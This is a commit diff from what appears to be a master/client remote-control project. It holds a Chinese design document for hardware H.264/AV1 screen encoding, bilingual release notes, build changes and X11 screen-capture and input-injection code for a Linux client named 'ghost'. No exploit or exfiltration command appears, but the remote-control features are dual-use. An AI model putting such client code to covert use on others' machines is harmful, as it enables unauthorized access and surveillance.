av_opt_set_int(m_ctx->priv_data, "tile-columns", 1, 0);
} else if (strcmp(name, "av1_amf") == 0) {
av_opt_set(m_ctx->priv_data, "usage", "lowlatency", 0);
av_opt_set(m_ctx->priv_data, "quality", "balanced", 0);
av_opt_set(m_ctx->priv_data, "rc", "cbr", 0);
} else if (strcmp(name, "av1_qsv") == 0) {
av_opt_set(m_ctx->priv_data, "preset", "medium", 0);
av_opt_set_int(m_ctx->priv_data, "async_depth", 1, 0);
}
```
实现建议:先把 `CFFmpegH264Encoder` 跑通稳定,**再把它复制改名做 AV1 版本**。同步两个类的逻辑可以后续考虑抽公共基类,但不要为了 DRY 提前抽。
### 6.5 EncoderFactory 与探测
`EncoderFactory.h`
```cpp
#pragma once
#include "VideoEncoderBase.h"
#include <memory>
struct ClientCapability {
bool supportAV1 = false;
bool supportH264 = true; // 假定都支持
};
struct EncoderRequest {
int width, height, fps;
int bitrate_kbps;
ClientCapability client;
};
std::unique_ptr<VideoEncoderBase> CreateEncoder(const EncoderRequest& req);
```
`EncoderFactory.cpp`
```cpp
#include "EncoderFactory.h"
#include "EncoderProbe.h"
#include "CFFmpegAV1Encoder.h"
#include "CFFmpegH264Encoder.h"
#include "X264Encoder.h"
std::unique_ptr<VideoEncoderBase> CreateEncoder(const EncoderRequest& req) {
EncoderParams p;
p.width = req.width;
p.height = req.height;
p.fps = req.fps;
// 1. AV1 路径(仅当客户端支持且启动探测确认硬件可用)
if (req.client.supportAV1 && EncoderProbe::HasAV1Hw()) {
auto enc = std::make_unique<CFFmpegAV1Encoder>();
p.rc = RateControl::BITRATE;
p.bitrate_kbps = req.bitrate_kbps;
if (enc->open(p)) {
LOG_INFO("encoder: AV1 backend=%s", enc->backendName());
return enc;
}
LOG_WARN("encoder: AV1 open failed, falling back to H.264");
}
// 2. H.264 硬编路径
if (EncoderProbe::HasH264Hw()) {
auto enc = std::make_unique<CFFmpegH264Encoder>();
p.rc = RateControl::BITRATE;
p.bitrate_kbps = req.bitrate_kbps;
if (enc->open(p)) {
LOG_INFO("encoder: H264-HW backend=%s", enc->backendName());
return enc;
}
LOG_WARN("encoder: H264 HW open failed, falling back to x264");
}
// 3. H.264 软编兜底(始终可用)
{
auto enc = std::make_unique<CX264Encoder>();
p.rc = RateControl::CRF;
p.crf = BitRateToCRF(req.bitrate_kbps);
if (enc->open(p)) {
LOG_INFO("encoder: H264-SW (libx264)");
return enc;
}
}
LOG_ERROR("encoder: all backends failed");
return nullptr;
}
```
要点:
- **不要**引入会话池(`HEVCSessionPool` 那套)—— 个人项目场景下不需要
- NVENC session 限制由 FFmpeg 自己报错,工厂捕获后自动降级
- 失败路径都打日志,方便定位
### 6.6 启动时一次性后端探测
避免每个新连接都重复尝试每个 backend
```cpp
// EncoderProbe.h
class EncoderProbe {
public:
static void RunOnce(); // 程序启动时调用一次
static bool HasAV1Hw();
static bool HasH264Hw();
static const char* PreferredAV1Backend(); // 第一个能用的 AV1 后端名
static const char* PreferredH264Backend();
};
// EncoderProbe.cpp 实现思路:
// 对每个候选后端尝试 alloc_context → open2 → free
// 用最低分辨率(如 640x480 @30fps减少探测开销
// 结果缓存在静态变量,加 std::once_flag 保证线程安全
```
启动时探测 1 次,运行时 `CreateEncoder` 直接读结果。
### 6.7 ScreenCapture.h 改造
**当前**`client/ScreenCapture.h:148, 926-930, 956-960`
```cpp
CX264Encoder* m_encoder;
// ...
m_encoder = new CX264Encoder();
int br = (m_nBitRate > 0) ? m_nBitRate : (width * height / 1266);
m_encoder->open(width, height, 20, BitRateToCRF(br));
```
**改造后**
```cpp
std::unique_ptr<VideoEncoderBase> m_encoder;
ClientCapability m_clientCap; // 握手阶段填入
// ...
if (!m_encoder) {
EncoderRequest req{
(int)width, (int)height, 20,
m_nBitRate > 0 ? m_nBitRate : (int)(width * height / 1266),
m_clientCap
};
m_encoder = CreateEncoder(req);
if (!m_encoder) return nullptr;
}
int err = m_encoder->encode(nextData, 32, 4 * width, width, height,
&encoded_data, &encoded_size);
```
注意:两处 `new CX264Encoder()` 提取成一个 `ensureEncoder()` 私有方法,避免重复。
### 6.8 协议握手(阶段二)
客户端浏览器 WebSocket 连接时上报:
```json
{
"type": "client_capability",
"codecs": ["av1", "h264"]
}
```
浏览器端探测脚本JS
```javascript
async function probeBrowserCodecs() {
const codecs = [];
if (typeof VideoDecoder !== 'undefined') {
// AV1 Main Profile, Level 4.0, 8-bit
const av1 = await VideoDecoder.isConfigSupported({ codec: 'av01.0.04M.08' });
if (av1.supported) codecs.push('av1');
}
codecs.push('h264'); // 兜底假定支持,<video> 标签也支持
return codecs;
}
```
**向后兼容**:老版本客户端不发 `codecs` 字段 → 服务端按 H.264 处理。`ClientCapability::supportAV1` 默认 false。
可参考 `docs/hevc_browser_decode_test.html`(改造一份 AV1 版本)做浏览器解码端到端验证。
---
## 7. 像素格式与转换
保持与现有 x264 路径完全一致的做法:
- **硬编内部格式**`AV_PIX_FMT_NV12`NVENC/QSV/AMF 通用)
- **转换库**libyuv不引入 `sws_scale`
- **BGRA → NV12**`libyuv::ARGBToNV12` 直接
- **RGB24 → NV12**libyuv 无直接 API分两步 RGB24 → I420 → NV12
- **direction 参数**:沿用现有 `X264Encoder.cpp:136` 的写法(`direction * height` 作为乘子)
---
## 8. 测试要求
### 8.1 单元测试
- `VideoEncoderBase` 各实现的 `open / encode / close` 生命周期
- `CFFmpegH264Encoder` 在缺失各后端时降级到下一个
- `EncoderFactory` 在不同 `ClientCapability` × 硬件能力 矩阵下返回正确后端
- `EncoderProbe::RunOnce()` 在不同 GPU 上的结果一致性
### 8.2 集成测试
| 场景 | 期望 |
|---|---|
| 客户端支持 AV1 + 编码端 RTX 40 | 使用 AV1`av1_nvenc` |
| 客户端支持 AV1 + 编码端 GTX 1080 | 降级 H.264 硬编(`h264_nvenc` |
| 客户端不支持 AV1 + 编码端任意 | H.264(硬编优先) |
| 编码端无 GPU / 虚拟机 | x264 软编 |
| 编码端集显 + 独显 | 优先级中第一个成功的后端 |
| 中途客户端能力变化 | 当前连接不变;下次握手按新能力 |
| H264 硬编创建失败 | 自动回落 x264 软编,连接不断 |
### 8.3 硬件验证矩阵
| 编码端 | 客户端浏览器 | 期望 |
|---|---|---|
| RTX 40 / 50 | Chrome / Firefox / Edge | AV1 |
| GTX 10/16 / RTX 20/30 | Chrome / Firefox / Edge | H.264 NVENC |
| Intel Arc | Chrome / Firefox | AV1`av1_qsv` |
| Intel 12 代+ 核显 | Chrome / Firefox | H.264 QSV |
| AMD RX 7000+ | Chrome / Firefox | AV1`av1_amf` |
| AMD 老卡 | Chrome / Firefox | H.264 AMF |
| 虚拟机 / 远程桌面会话 | 任意 | x264 软编 |
| iOS Safari < 17 | 任意编码端 | H.264 |
| iOS Safari ≥ 17A17 Pro+ | 任意编码端 | AV1 优先 |
### 8.4 体积验证
- exe 体积增量 < 12 MBvcpkg 静态链接,含 AV1+H264 全后端)
- 若超出明显,检查 vcpkg feature 是否引入了不需要的 codec
### 8.5 回归测试(关键)
每一步改造后必须验证:
- 现有 x264 软编通路完全可用(在禁用所有硬编后端的环境下)
- 现有客户端(不发 `codecs` 字段)可正常工作
- 编码码流向后兼容,老客户端能解
---
## 9. 已知风险与注意事项
### 9.1 多 GPU 跨适配器
笔记本集显+独显场景FFmpeg 默认走主显卡。可能报 "failed to create device"。**Catch 后回落到下一个后端**,不要直接终止。
### 9.2 第一帧延迟
FFmpeg 硬编可能在首次 `send_frame``receive_packet` 返回 `EAGAIN`。调用方代码必须能处理 `*lpSize == 0` 的情况(返回 0 表示成功但本次无输出)。`ScreenCapture::GetNextScreenData` 当前 `encoded_size == 0` 会怎么处理需要确认。
### 9.3 NVENC session 数限制
NVIDIA **消费级**卡GeForce有 NVENC session 上限(驱动 522.25+ 起 3 个,更新版可能放宽到 5。多连接超限时 `open` 失败 → 工厂自动降级到 QSV/AMF/x264。**不要做"会话池"提前拦截** —— 让 FFmpeg 自己报错,工厂处理。
### 9.4 浏览器解 AV1 的硬件依赖
- 桌面 Chrome/Firefox/Edge软解兜底CPU 占用高,但能用)
- 移动端iPhone 15 Pro+ / M3+ 才有 AV1 硬解,老设备只能软解(可能卡)
- `isConfigSupported` 报 true 不等于跑得流畅。**建议握手时也带上设备类型**,弱设备强制走 H.264
### 9.5 LGPL 静态链接合规
个人项目暂搁置。商用前需法务确认FFmpeg 源代码提供、重新链接能力等)。
### 9.6 配置项(建议)
建议做成 INI/JSON
```
encoder.prefer_av1 = true
encoder.h264.bitrate_default = 4000 (kbps)
encoder.fallback_to_x264 = true
encoder.probe_at_startup = true
encoder.disable_h264_mf = true (h264_mf 质量一般,可禁用)
```
### 9.7 日志要求
关键路径必须有日志:
- 启动探测结果:每个后端是否可用 + 失败原因(`av_err2str`
- 每个连接选定的 `codec` + `backend`INFO
- 后端打开失败 + 回落WARN
- 编码过程中的异常ERROR
### 9.8 线程安全
- 每个编码器实例不跨线程
- `EncoderProbe` 单例首次初始化加 `std::once_flag`
- FFmpeg 新版本不需要全局初始化(`av_register_all` 已废弃)
### 9.9 与现有 `DISABLE_X264_FOR_TEST` 编译开关协同
项目已有 `DISABLE_X264_FOR_TEST` 宏(见 `X264Encoder.cpp:5`)和最近 `c0a632a` 提交"Compliance: Add building option to disable x264 and ffmpeg"。新代码须遵循同样的可禁用约定:
- `ENABLE_HW_ENCODER` 关闭时整个 `CFFmpegH264Encoder` / `CFFmpegAV1Encoder` 编译为空实现或不参与链接
- 工厂在该宏关闭时直接返回 `CX264Encoder`
---
## 10. 实现顺序建议
**每一步独立可合入**,每一步完成后 x264 通路必须可用、客户端无感知。
### Step 0抽象层零功能改动
1. 新建 `VideoEncoderBase.h`,定义接口 + `EncoderParams` + `RateControl`
2. `CX264Encoder` 改造继承 `VideoEncoderBase`
- 新增 `forceIDR()`(设置一个标志,下次 encode 时通过 `x264_picture_t::i_type = X264_TYPE_IDR`
- 实现 `codec()` 返回 `H264`
- 实现 `backendName()` 返回 `"x264"`
-`open(w, h, fps, crf)` 签名保留,转调新的 `open(EncoderParams)`
3. `ScreenCapture::m_encoder``std::unique_ptr<VideoEncoderBase>`,但仍直接 `new CX264Encoder`
4. **不引 FFmpeg、不引工厂**
5. 验证H.264 通路完全不变,对外行为零变化
### Step 1FFmpeg 集成 + `h264_nvenc` 单后端
1. vcpkg 安装 `ffmpeg[core,nvcodec]:x64-windows-static-md`
2. 工程添加包含目录 / 库目录 / 系统库
3. 新建 `CFFmpegH264Encoder`,仅实现 `h264_nvenc`
4.`ScreenCapture` 加临时开关:硬编码切到 `CFFmpegH264Encoder` 跑一下
5. 用浏览器解码 demo 验证码流能解
6. 体积验证(应 +46 MB
### Step 2扩展 H.264 硬编后端
1. `CFFmpegH264Encoder``h264_qsv` / `h264_amf` 探测
2. 顺序:`nvenc → qsv → amf``mf` 可暂不接)
3. 不同后端的参数适配(见 §6.3.2
4. 测试 Intel 核显 + AMD 卡
### Step 3工厂 + 软编兜底
1. 新建 `EncoderFactory` / `EncoderProbe`
2. 工厂按 `H264 硬编 → x264 软编` 顺序
3. `ScreenCapture` 改用工厂(消除两处 `new CX264Encoder`
4. 测试无 GPU 环境降级到 x264
### Step 4AV1 路径(独立闭环)
1. 重跑 vcpkg`ffmpeg[core,nvcodec,amf,qsv]:x64-windows-static-md`
2. 新建 `CFFmpegAV1Encoder`,结构与 H.264 对称(直接 copy + 改 backend 名 + 调参)
3. `EncoderProbe` 加 AV1 探测
4. 工厂前置 AV1 路径
5. 硬件验证矩阵执行
### Step 5握手协商 + 浏览器探测
1. 客户端 JS `isConfigSupported` 探测 AV1 / H.264
2. WebSocket 握手字段 `codecs` 上报
3. 服务端解析后填入 `ClientCapability`
4. 老客户端向后兼容(无 `codecs` 字段 → 默认 H.264
5. 端到端验证:编码端 RTX 40 + 浏览器 Chrome 走 AV1回落场景走 H.264
---
## 11. 不在本次范围
- HEVC 编码(决策已排除,见 §1.3.1
- 软编 AV1libaom / SVT-AV1CPU 占用不适合远控)
- 运行中动态切换 codec需要切换就重连
- 转发流1 路编码多路分发)
- 桌面捕获共享
- 客户端浏览器解码具体实现(可参考 `docs/hevc_browser_decode_test.html` 改 AV1 版本验证)
- Linux/macOS 移植
- FFmpeg DLL 形式分发
---
## 12. 参考资料
- FFmpeg 编码器列表:`ffmpeg -encoders | grep -E "h264|av1"`
- NVENC 参数:`ffmpeg -h encoder=h264_nvenc``ffmpeg -h encoder=av1_nvenc`
- QSV 参数:`ffmpeg -h encoder=h264_qsv``ffmpeg -h encoder=av1_qsv`
- AMF 参数:`ffmpeg -h encoder=h264_amf``ffmpeg -h encoder=av1_amf`
- NVIDIA Video Codec Support Matrixhttps://developer.nvidia.com/video-encode-and-decode-gpu-support-matrix-new
- WebCodecs APIhttps://developer.mozilla.org/en-US/docs/Web/API/WebCodecs_API
- libyuvhttps://chromium.googlesource.com/libyuv/libyuv/
- vcpkg ffmpeg porthttps://github.com/microsoft/vcpkg/tree/master/ports/ffmpeg
- FFmpeg HWAccel Introhttps://trac.ffmpeg.org/wiki/HWAccelIntro
- AOMedia AV1https://aomedia.org/
---
**文档结束**
实现时如遇到本文档未覆盖的设计抉择,优先选择**简单、与现有 x264 通路对称、不破坏已有功能、不增加运行时外部依赖**的方案,并在代码注释中说明决策依据。

124
history.md
View File

@@ -651,6 +651,68 @@ Release v1.1.4
* 修复: 屏幕缩放时远程控制坐标不正确 * 修复: 屏幕缩放时远程控制坐标不正确
* 修复: CShellDlg::OnCtlColor 中的 GDI 画刷泄漏 * 修复: CShellDlg::OnCtlColor 中的 GDI 画刷泄漏
**2026.02.28**
发布版本 v1.2.7
本版本引入支持 C2C 的 V2 文件传输协议,集成现代 Web 终端,并扩展 Linux 客户端能力。
* 功能: V2 文件传输协议,支持大于 4GB 的文件
* 功能: C2C客户端到客户端直接传输无需经过主控中转
* 功能: 断点续传,状态持久化到 `%TEMP%\FileTransfer\`
* 功能: SHA-256 文件完整性校验
* 功能: 基于 WebView2 + xterm.js 的现代 Web 终端
* 功能: Linux 客户端新增文件管理支持
* 改进: 主机列表批量更新,减少 UI 闪烁
* 改进: V1/V2 协议共存与自动识别
* 改进: 77 字节 V2 包头预留扩展字段
* 修复: 文件对话框释放阶段的若干稳定性问题
**2026.03.11**
发布版本 v1.2.8
本版本新增主机上线邮件通知、远程音频播放、V2 授权协议,并改进多 FRPS 支持。
* 功能: 主机上线邮件通知SMTP 配置、关键词匹配、右键快捷添加)
* 功能: 远程音频播放WASAPI Loopback+ Opus 压缩(约 24:1
* 功能: 多 FRPS 服务器同时连接支持
* 功能: 自定义光标显示和追踪
* 功能: V2 授权协议,采用 ECDSA 签名
* 改进: Linux 客户端屏幕压缩算法调优
* 改进: 非中文 Windows 主机的编码强化
* 修复: 非中文 Windows 系统乱码问题
**2026.03.27**
发布版本 v1.2.9
本版本强化网络安全新增连接限流、IP 白/黑名单,加固代理崩溃恢复,并带来 Linux 剪贴板同步及 V2 文件传输。
* 功能: 网络配置对话框IP 白/黑名单实时生效
* 功能: 可配置的连接限流DLL 请求限流、IP 封禁阈值可调)
* 功能: IP 历史记录对话框,查看授权 IP 登录历史
* 功能: 状态栏显示 MTBF/运行时间和授权到期日期
* 功能: 代理崩溃保护——5 分钟内 3 次崩溃自动切换普通模式
* 功能: 客户端搜索Ctrl+F快速搜索 IP、位置、计算机名
* 功能: 自动封禁异常 IP——60 秒内超过 15 次连接自动封禁 1 小时
* 功能: Proxy Protocol v2 支持FRP 代理后获取真实客户端 IP
* 功能: Linux 剪贴板同步和 V2 文件传输支持
* 功能: 右键菜单运行客户端程序
* 功能: 多层授权混淆支持
* 改进: 增强授权检查,添加 IP 封禁提示
* 改进: 支持主控程序以用户权限运行
* 改进: 大 DLL 自动使用 TinyRun 回退方案
* 改进: 最大数据包从 10MB 提升到 50MB
* 改进: mstsc 远程会话可读取用户注册表
* 改进: 授权码格式验证,过滤垃圾数据
* 修复: OnUserOfflineMsg 竞态条件导致主控崩溃
* 修复: 客户端请求 FRPC DLL 时 FrpcParam 丢失
* 修复: 远程桌面最小化时剪贴板误触发
* 修复: 操作进程对话框时主控崩溃
* 修复: 状态栏主机数量实时更新
* 修复: Linux `select()` 调用前未重置 timeval
--- ---
[English, since 2025] [English, since 2025]
@@ -1061,3 +1123,65 @@ This release focuses on optimizing remote desktop toolbar experience, enhancing
* Fix: Race condition causes Linux client crash * Fix: Race condition causes Linux client crash
* Fix: Incorrect remote control coordinates when screen is scaled * Fix: Incorrect remote control coordinates when screen is scaled
* Fix: GDI brush leak in CShellDlg::OnCtlColor * Fix: GDI brush leak in CShellDlg::OnCtlColor
**2026.02.28**
Release v1.2.7
This release introduces the V2 file transfer protocol with C2C support, integrates a modern Web terminal, and extends Linux client capabilities.
* Feature: V2 file transfer protocol with support for files larger than 4GB
* Feature: C2C (client-to-client) direct file transfer, no master relay required
* Feature: Resumable file transfer with state persistence under `%TEMP%\FileTransfer\`
* Feature: SHA-256 file integrity verification
* Feature: Modern Web terminal based on WebView2 + xterm.js
* Feature: Linux client adds file management support
* Improve: Batch host list updates to reduce UI flicker
* Improve: V1/V2 protocol coexistence and auto-detection
* Improve: 77-byte V2 packet header with reserved fields for future extension
* Fix: Misc stability improvements around file dialog teardown
**2026.03.11**
Release v1.2.8
This release adds host online email notifications, enables remote audio playback, introduces the V2 license protocol, and improves multi-FRPS support.
* Feature: Host online email notification (SMTP configuration, keyword matching, right-click quick-add)
* Feature: Remote audio playback via WASAPI Loopback + Opus compression (~24:1 ratio)
* Feature: Multi-FRPS server simultaneous connection support
* Feature: Custom cursor display and tracking
* Feature: V2 license protocol with ECDSA signature
* Improve: Linux client screen compression algorithm tuning
* Improve: Encoding hardening for non-Chinese Windows hosts
* Fix: Mojibake on non-Chinese Windows systems
**2026.03.27**
Release v1.2.9
This release strengthens network security, adds connection rate limiting, introduces IP whitelisting / blacklisting, hardens proxy crash recovery, and brings Linux clipboard sync and V2 file transfer.
* Feature: Network configuration dialog with IP whitelist / blacklist, applied in real time
* Feature: Configurable connection rate limiting (DLL request throttle, IP ban threshold)
* Feature: IP history dialog showing authorized-IP login history
* Feature: Status bar displays MTBF / uptime and license expiry date
* Feature: Proxy crash protection — auto-fallback to direct mode after 3 crashes within 5 minutes
* Feature: Client search (Ctrl+F) — quick filter by IP, location, computer name
* Feature: Auto-ban abnormal IPs — 60s / 15-connection threshold triggers a 1-hour ban
* Feature: Proxy Protocol v2 support — recover real client IP behind FRP
* Feature: Linux clipboard sync and V2 file transfer support
* Feature: Right-click menu to run client program
* Feature: Multi-layer license obfuscation
* Improve: Authorization check tightened with IP ban hints
* Improve: Master can run with normal user privileges
* Improve: Large DLLs automatically fall back to TinyRun
* Improve: Max packet size raised from 10MB to 50MB
* Improve: mstsc remote sessions can read user registry hive
* Improve: Authorization code format validation, filters garbage input
* Fix: OnUserOfflineMsg race condition causing master crash
* Fix: FrpcParam lost when client requests FRPC DLL
* Fix: Minimized remote desktop falsely triggering clipboard handling
* Fix: Master crash when operating on the process dialog
* Fix: Status bar host count now updates in real time
* Fix: Linux `select()` timeval not being reset before each call

BIN
images/FileManage.jpg
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 66 KiB

After

Width:  |  Height:  |  Size: 119 KiB

BIN
images/LinuxClient.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 42 KiB

After

Width:  |  Height:  |  Size: 125 KiB

BIN
images/WebRemote.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 345 KiB

9
linux/CMakeLists.txt
View File

@@ -28,6 +28,7 @@ set(SOURCES
main.cpp main.cpp
../client/Buffer.cpp ../client/Buffer.cpp
../client/IOCPClient.cpp ../client/IOCPClient.cpp
../client/sign_shim_unix.cpp
) )
add_executable(ghost ${SOURCES}) add_executable(ghost ${SOURCES})
@@ -40,6 +41,14 @@ set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -g")
message(STATUS "链接库文件: ${CMAKE_SOURCE_DIR}/lib/libzstd.a") message(STATUS "链接库文件: ${CMAKE_SOURCE_DIR}/lib/libzstd.a")
target_link_libraries(ghost PRIVATE "${CMAKE_SOURCE_DIR}/lib/libzstd.a") target_link_libraries(ghost PRIVATE "${CMAKE_SOURCE_DIR}/lib/libzstd.a")
# 链接私有签名库(提供 signMessage / verifyMessage源码不开源
# 该库由 SimplePlugins 仓库本地构建后放置于 lib/,构建机需先准备好
target_link_libraries(ghost PRIVATE "${CMAKE_SOURCE_DIR}/lib/libsign.a")
# libsign.a 内部使用 OpenSSL HMAC需要在最终可执行链接 libcrypto
find_package(OpenSSL REQUIRED)
target_link_libraries(ghost PRIVATE OpenSSL::Crypto)
# 链接 dl 库dlopen/dlsym 用于运行时加载 X11 # 链接 dl 库dlopen/dlsym 用于运行时加载 X11
target_link_libraries(ghost PRIVATE dl) target_link_libraries(ghost PRIVATE dl)

2
linux/README.md
View File

@@ -261,7 +261,7 @@ loginctl show-session $(loginctl | grep $(whoami) | awk '{print $1}') -p Type
| `InstallTime` | 首次安装时间 | `1709856000` | | `InstallTime` | 首次安装时间 | `1709856000` |
| `PublicIP` | 公网 IP 缓存 | `1.2.3.4` | | `PublicIP` | 公网 IP 缓存 | `1.2.3.4` |
| `GeoLocation` | 地理位置缓存 | `北京市` | | `GeoLocation` | 地理位置缓存 | `北京市` |
| `QualityLevel` | 屏幕质量等级 | `-1` (自适应) | | `QualityLevel` | 屏幕质量等级 | `2` (Good / H264 1080P) |
### 质量等级说明 ### 质量等级说明

351
linux/ScreenHandler.h
View File

@@ -3,7 +3,8 @@
#include "client/IOCPClient.h" #include "client/IOCPClient.h"
#include "LinuxConfig.h" #include "LinuxConfig.h"
#include "ClipboardHandler.h" #include "ClipboardHandler.h"
#include "FileTransferV2.h" #include "common/FileTransferV2.h"
#include "X264Encoder.h"
#include <dlfcn.h> #include <dlfcn.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <thread> #include <thread>
@@ -11,7 +12,9 @@
#include <atomic> #include <atomic>
#include <vector> #include <vector>
#include <cstring> #include <cstring>
#include <cstdlib>
#include <stdexcept> #include <stdexcept>
#include <memory>
// 客户端 ID定义在 main.cpp // 客户端 ID定义在 main.cpp
extern uint64_t g_myClientID; extern uint64_t g_myClientID;
@@ -110,27 +113,39 @@ struct XGCValues_LNX {
#define IncludeInferiors 1 #define IncludeInferiors 1
// ============== 屏幕算法常量 ============== // ============== 屏幕算法常量 ==============
#define ALGORITHM_GRAY 0 // 常量定义已移至 commands.h: ALGORITHM_GRAY, ALGORITHM_DIFF, ALGORITHM_H264, ALGORITHM_RGB565
#define ALGORITHM_DIFF 1
#define ALGORITHM_H264 2
#define ALGORITHM_RGB565 3
// 算法支持表(编译时常量,日后支持 H264 时改为 true // 检查算法是否支持H264 需要运行时检测
static const bool g_SupportedAlgo[] = { inline bool IsAlgorithmSupported(uint8_t algo) {
true, // ALGORITHM_GRAY = 0 switch (algo) {
true, // ALGORITHM_DIFF = 1 case ALGORITHM_GRAY:
false, // ALGORITHM_H264 = 2 case ALGORITHM_DIFF:
true, // ALGORITHM_RGB565 = 3 case ALGORITHM_RGB565:
}; return true;
case ALGORITHM_H264:
return X264Encoder::IsAvailable();
default:
return false;
}
}
// 不支持的算法降级为 RGB565 // 不支持的算法降级为 RGB565
inline uint8_t GetEffectiveAlgorithm(uint8_t algo) { inline uint8_t GetEffectiveAlgorithm(uint8_t algo) {
if (algo > 3 || !g_SupportedAlgo[algo]) { if (!IsAlgorithmSupported(algo)) {
Mprintf(">>> Algorithm %d not supported, fallback to RGB565\n", algo);
return ALGORITHM_RGB565; return ALGORITHM_RGB565;
} }
return algo; return algo;
} }
// 码率到 CRF 映射 (参考 Windows/macOS 实现)
inline int BitRateToCRF(int bitrate) {
if (bitrate >= 3000) return 20; // 高质量
if (bitrate >= 2000) return 23; // 中等
if (bitrate >= 1200) return 26; // 较低
return 30; // 最低
}
// ============== 颜色转换函数 ============== // ============== 颜色转换函数 ==============
// BGRA → 灰度 (Y = 0.299R + 0.587G + 0.114B) // BGRA → 灰度 (Y = 0.299R + 0.587G + 0.114B)
@@ -375,6 +390,16 @@ static unsigned long VKtoKeySym(unsigned int vk)
} }
} }
// XFixes cursor image structure (for cursor type detection)
struct XFixesCursorImage {
short x, y;
unsigned short width, height;
unsigned short xhot, yhot;
unsigned long cursor_serial;
unsigned long* pixels;
// Atom cursor_name; // Only in XFixes 2.0+
};
// X11 函数指针类型 // X11 函数指针类型
typedef Display* (*fn_XOpenDisplay)(const char*); typedef Display* (*fn_XOpenDisplay)(const char*);
typedef int (*fn_XCloseDisplay)(Display*); typedef int (*fn_XCloseDisplay)(Display*);
@@ -391,12 +416,18 @@ typedef int (*fn_XSync)(Display*, int);
typedef unsigned long (*fn_XKeysymToKeycode)(Display*, unsigned long); typedef unsigned long (*fn_XKeysymToKeycode)(Display*, unsigned long);
typedef int (*fn_XFlush)(Display*); typedef int (*fn_XFlush)(Display*);
typedef int (*fn_XClearArea)(Display*, Window, int, int, unsigned int, unsigned int, int); typedef int (*fn_XClearArea)(Display*, Window, int, int, unsigned int, unsigned int, int);
typedef int (*fn_XQueryPointer)(Display*, Window, Window*, Window*, int*, int*, int*, int*, unsigned int*);
typedef int (*fn_XFree)(void*);
// XTest 扩展函数指针类型(用于模拟鼠标/键盘输入) // XTest 扩展函数指针类型(用于模拟鼠标/键盘输入)
typedef int (*fn_XTestFakeMotionEvent)(Display*, int, int, int, unsigned long); typedef int (*fn_XTestFakeMotionEvent)(Display*, int, int, int, unsigned long);
typedef int (*fn_XTestFakeButtonEvent)(Display*, unsigned int, int, unsigned long); typedef int (*fn_XTestFakeButtonEvent)(Display*, unsigned int, int, unsigned long);
typedef int (*fn_XTestFakeKeyEvent)(Display*, unsigned int, int, unsigned long); typedef int (*fn_XTestFakeKeyEvent)(Display*, unsigned int, int, unsigned long);
// XFixes 扩展函数指针类型(用于光标类型检测)
typedef int (*fn_XFixesQueryExtension)(Display*, int*, int*);
typedef XFixesCursorImage* (*fn_XFixesGetCursorImage)(Display*);
// X11 动态加载包装 // X11 动态加载包装
class X11Loader class X11Loader
{ {
@@ -430,13 +461,19 @@ public:
fn_XKeysymToKeycode pXKeysymToKeycode; fn_XKeysymToKeycode pXKeysymToKeycode;
fn_XFlush pXFlush; fn_XFlush pXFlush;
fn_XClearArea pXClearArea; fn_XClearArea pXClearArea;
fn_XQueryPointer pXQueryPointer;
fn_XFree pXFree;
// XTest 扩展(用于模拟输入) // XTest 扩展(用于模拟输入)
fn_XTestFakeMotionEvent pXTestFakeMotionEvent; fn_XTestFakeMotionEvent pXTestFakeMotionEvent;
fn_XTestFakeButtonEvent pXTestFakeButtonEvent; fn_XTestFakeButtonEvent pXTestFakeButtonEvent;
fn_XTestFakeKeyEvent pXTestFakeKeyEvent; fn_XTestFakeKeyEvent pXTestFakeKeyEvent;
X11Loader() : m_handle(nullptr), m_xtst_handle(nullptr) // XFixes 扩展(用于光标类型检测)
fn_XFixesQueryExtension pXFixesQueryExtension;
fn_XFixesGetCursorImage pXFixesGetCursorImage;
X11Loader() : m_handle(nullptr), m_xtst_handle(nullptr), m_xfixes_handle(nullptr)
{ {
pXOpenDisplay = nullptr; pXOpenDisplay = nullptr;
pXCloseDisplay = nullptr; pXCloseDisplay = nullptr;
@@ -457,9 +494,13 @@ public:
pXKeysymToKeycode = nullptr; pXKeysymToKeycode = nullptr;
pXFlush = nullptr; pXFlush = nullptr;
pXClearArea = nullptr; pXClearArea = nullptr;
pXQueryPointer = nullptr;
pXFree = nullptr;
pXTestFakeMotionEvent = nullptr; pXTestFakeMotionEvent = nullptr;
pXTestFakeButtonEvent = nullptr; pXTestFakeButtonEvent = nullptr;
pXTestFakeKeyEvent = nullptr; pXTestFakeKeyEvent = nullptr;
pXFixesQueryExtension = nullptr;
pXFixesGetCursorImage = nullptr;
} }
bool Load() bool Load()
@@ -489,6 +530,8 @@ public:
pXKeysymToKeycode = (fn_XKeysymToKeycode)dlsym(m_handle, "XKeysymToKeycode"); pXKeysymToKeycode = (fn_XKeysymToKeycode)dlsym(m_handle, "XKeysymToKeycode");
pXFlush = (fn_XFlush)dlsym(m_handle, "XFlush"); pXFlush = (fn_XFlush)dlsym(m_handle, "XFlush");
pXClearArea = (fn_XClearArea)dlsym(m_handle, "XClearArea"); pXClearArea = (fn_XClearArea)dlsym(m_handle, "XClearArea");
pXQueryPointer = (fn_XQueryPointer)dlsym(m_handle, "XQueryPointer");
pXFree = (fn_XFree)dlsym(m_handle, "XFree");
// 加载 XTest 扩展库(用于模拟鼠标/键盘输入) // 加载 XTest 扩展库(用于模拟鼠标/键盘输入)
m_xtst_handle = dlopen("libXtst.so.6", RTLD_LAZY); m_xtst_handle = dlopen("libXtst.so.6", RTLD_LAZY);
@@ -499,7 +542,15 @@ public:
pXTestFakeKeyEvent = (fn_XTestFakeKeyEvent)dlsym(m_xtst_handle, "XTestFakeKeyEvent"); pXTestFakeKeyEvent = (fn_XTestFakeKeyEvent)dlsym(m_xtst_handle, "XTestFakeKeyEvent");
} }
// 基本 X11 函数必须全部存在XTest 函数可选(没有时无法控制输入 // 加载 XFixes 扩展库(用于光标类型检测
m_xfixes_handle = dlopen("libXfixes.so.3", RTLD_LAZY);
if (!m_xfixes_handle) m_xfixes_handle = dlopen("libXfixes.so", RTLD_LAZY);
if (m_xfixes_handle) {
pXFixesQueryExtension = (fn_XFixesQueryExtension)dlsym(m_xfixes_handle, "XFixesQueryExtension");
pXFixesGetCursorImage = (fn_XFixesGetCursorImage)dlsym(m_xfixes_handle, "XFixesGetCursorImage");
}
// 基本 X11 函数必须全部存在XTest/XFixes 函数可选
